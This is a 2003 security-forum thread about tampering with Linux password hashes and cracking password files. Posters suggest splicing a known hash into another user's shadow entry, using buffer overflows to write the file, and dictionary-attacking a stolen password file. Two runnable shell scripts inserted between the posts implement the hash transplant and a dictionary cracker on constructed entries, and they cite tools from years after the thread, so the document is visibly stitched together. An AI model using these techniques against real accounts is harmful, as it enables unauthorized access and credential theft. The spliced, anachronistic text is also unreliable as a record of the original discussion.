UGN Security
Posted By: Chasm Newbs question on password files - 08/07/03 09:56 PM
A little help here would be much appreciated. I was wondering about password files. I know quite a bit about how to crack them, and why the passwords can't be reversed. So I was wondering, why don't you just modify the password file, so that the encrypted part is the same as an encrypted password you know? I hope someone understands me!!! I'll try and explain what I mean, if people don't understand me.
Posted By: SilentRage Re: Newbs question on password files - 08/07/03 10:24 PM
Usually you can do that very thing. I've remarked before how sending encrypted passwords on a network isn't very secure. Just because you can't figure out the original password doesn't mean you can't log in with the encrypted form. Unfortunately you'd have to be pretty experienced in protocols and programming to make use of that. You'd have to be able to sniff networks and code yourself some programs to take advantage.

There's a program called ERD Commander which overwrites NT/2K/XP passwords from DOS. It doesn't take but a second to do it.
Posted By: Chasm Re: Newbs question on password files - 08/08/03 12:29 AM
Thanks for that. I mean with regards to Linux, as opposed to Windows, though. I hope you understand what I mean. Let's suppose your Linux password is "password", so you look in your pwd file and copy the encrypted version of "password". Then theoretically all you should need to do is replace any password in a different password file with what you just copied, and you should be able to log in as that user using your password. Is that what you thought I meant?

I totally agree with you on plaintext passwords. I understand the principles (but don't have much experience), and think that anyone with an ounce of common sense would realise what a danger it can be, especially when anyone can get their hands on a packet sniffer and "easily" read them.
Posted By: SilentRage Re: Newbs question on password files - 08/08/03 08:09 PM
I wasn't talking about plaintext passwords. I was talking about encrypted passwords being no better than plaintext. That you don't need to see the plaintext. Just use the encrypted password.

And what you said is very imaginative. I heartily support a test to see if it actually works. There's a chance that it won't though - like if they use the username as a key to decrypt the password. Who knows. Just try it and report back to us on the results.
Posted By: jonconley Re: Newbs question on password files - 08/08/03 09:17 PM
Yes. In some situations it can work. As can removing the password field altogether.

Now if you are talking about Linux specifically, a big problem may be that there are a lot of ways to get hold of the file, but attempting to write to the file and writing to it (to use the hash you know) is opening a whole new can of worms.
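Chasm's transplant, tried out as an added example (my code, not a program from the thread). It builds two shadow-style entries for a constructed pair of accounts, splices the known hash into the second entry, and checks the result with `openssl passwd -6`, which produces the same sha512-crypt (`$6$`) hash as glibc/libxcrypt crypt(3) for a given salt. The account names, salts and passwords are invented for the demonstration; the real /etc/shadow is never read or written.

```shell
#!/bin/sh
# Added example, not from the thread. Assumes `openssl passwd -6` (sha512-crypt,
# OpenSSL 1.1.1 or later) is on the PATH. Every entry below is constructed for
# the demonstration; the real /etc/shadow is never touched.

# Shadow-style entry for the account whose password we know ("password").
ATTACKER_ENTRY="chasm:$(openssl passwd -6 -salt c7RkNdQ2 password):12250:0:99999:7:::"

# Shadow-style entry for the target; its password is not known to us.
VICTIM_ENTRY="victim:$(openssl passwd -6 -salt Zq9wL1mX Tr0ub4dor-3):12250:0:99999:7:::"

# hash_of LINE: print the hash field (field 2) of a shadow-style line.
hash_of() {
    printf '%s\n' "$1" | cut -d: -f2
}

# transplant LINE HASH: print LINE with its hash field replaced by HASH,
# leaving the account name and the password-ageing fields untouched.
transplant() {
    name=$(printf '%s\n' "$1" | cut -d: -f1)
    rest=$(printf '%s\n' "$1" | cut -d: -f3-)
    printf '%s:%s:%s\n' "$name" "$2" "$rest"
}

# check_password LINE CANDIDATE: recompute sha512-crypt of CANDIDATE with the
# salt stored in LINE's hash (the text between the second and third '$') and
# print "match" if it equals the stored hash, "nomatch" otherwise. This is
# what login does, minus the privilege needed to read /etc/shadow.
check_password() {
    stored=$(hash_of "$1")
    salt=$(printf '%s\n' "$stored" | cut -d'$' -f3)
    if [ "$(openssl passwd -6 -salt "$salt" "$2")" = "$stored" ]; then
        echo match
    else
        echo nomatch
    fi
}

# Splice the known hash into the victim's entry and test the known password
# against both the original and the modified line.
NEW_ENTRY=$(transplant "$VICTIM_ENTRY" "$(hash_of "$ATTACKER_ENTRY")")
printf 'original entry: %s\n' "$(check_password "$VICTIM_ENTRY" password)"   # nomatch
printf 'after splice:   %s\n' "$(check_password "$NEW_ENTRY" password)"      # match
```

It works because crypt(3) hashes the password together with the salt stored in the hash field and nothing else: the username is not a key, so a hash copied between entries still verifies. What makes it hard in practice is the point jonconley raises: the hash field lives in /etc/shadow, readable and writable only by root, so getting the write is the problem, not the splice. A locked account carries `*` or `!` instead of a hash, and swapping a valid hash in unlocks it, which is one reason to keep an integrity check on /etc/shadow.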
Posted By: Chasm Re: Newbs question on password files - 08/08/03 10:20 PM
I'm currently experimenting with it. I've written a small program in C++ that sort of does it, but am having no joy in getting access. I have a few more ideas; will post source soon, if it works.

A friend recommended using a buffer overflow to write to the password file, so far I've had not much luck with that.

Thanks for the advice
Posted By: superpozition Re: Newbs question on password files - 08/08/03 10:52 PM
Chasm

Here is what I do. Say you get someone's password file and you want to decrypt some of those passwords. You obviously can't write a program to decrypt them, but what you can do is this:

1) Get a huge list of words (possibly a dictionary list).
2) In Linux they have a standard algorithm they use for encrypting those plaintext passwords into encrypted text. Search for it and use the code in your program to encrypt all the words in your dictionary file.
3) Now all you have to do is write a little program which will loop through and try and match your encrypted dictionary file with your password file.

Simple stuff isn't it?
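Steps 1 to 3 as a runnable added example (my code, not superpozition's program): a constructed shadow file, a constructed five-word list, and a loop that hashes each word with `openssl passwd -6` using the salt of the entry under attack and reports a hit on a match. The account names, salts and passwords are invented for the demonstration.

```shell
#!/bin/sh
# Added example, not from the thread. Assumes `openssl passwd -6` (sha512-crypt,
# OpenSSL 1.1.1 or later). The shadow file and the wordlist are constructed for
# the demonstration; no real file is read.

# Constructed shadow file: three real sha512-crypt entries plus two locked
# accounts ('*' and '!' are not hashes and can never match).
SHADOW=$(printf '%s\n' \
    "alice:$(openssl passwd -6 -salt 8kDf2Zs1 letmein):12250:0:99999:7:::" \
    "bob:$(openssl passwd -6 -salt Pq7xR3mN dragon):12250:0:99999:7:::" \
    "carol:$(openssl passwd -6 -salt Tz4vB8wQ Correct-Horse-9):12250:0:99999:7:::" \
    "daemon:*:12250:0:99999:7:::" \
    "nobody:!:12250:0:99999:7:::")

# Constructed wordlist (step 1); a real run would read the dictionary file.
WORDLIST=$(printf '%s\n' password 123456 letmein qwerty dragon)

# crack_user LINE: try every word against one shadow entry. Because the hash
# is salted, the dictionary has to be hashed with THIS entry's salt, so step 2
# (encrypt the dictionary once) is done here per entry instead. Prints
# "user:word" on a hit, nothing otherwise.
crack_user() {
    user=$(printf '%s\n' "$1" | cut -d: -f1)
    stored=$(printf '%s\n' "$1" | cut -d: -f2)
    case "$stored" in
        '$6$'*) ;;          # sha512-crypt: the only scheme handled here
        *) return 0 ;;      # locked account or another scheme: skip
    esac
    salt=$(printf '%s\n' "$stored" | cut -d'$' -f3)
    printf '%s\n' "$WORDLIST" | while IFS= read -r word; do
        if [ "$(openssl passwd -6 -salt "$salt" "$word")" = "$stored" ]; then
            printf '%s:%s\n' "$user" "$word"
            break
        fi
    done
}

# crack_all: step 3, the loop over the whole file.
crack_all() {
    printf '%s\n' "$SHADOW" | while IFS= read -r line; do
        crack_user "$line"
    done
}

crack_all     # prints alice:letmein and bob:dragon; carol's password is not in the list
```

The caveat a practitioner needs on step 2: crypt(3) hashes are salted, and the salt sits between the second and third `$` (for classic DES crypt, the first two characters of the hash), so a dictionary encrypted once only matches entries that happen to share that salt. The loop above therefore re-hashes the list for every entry, which is what John the Ripper and similar tools do in-process; spawning openssl per word is fine for a handful of entries and far too slow beyond that. With DES crypt's 12-bit salt (4096 values) and eight-character password limit a precomputed table was only 4096 times the dictionary; sha512-crypt's 16-character salt and its thousands of rounds rule that out, which is the point of salting.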
© UGN Security Forum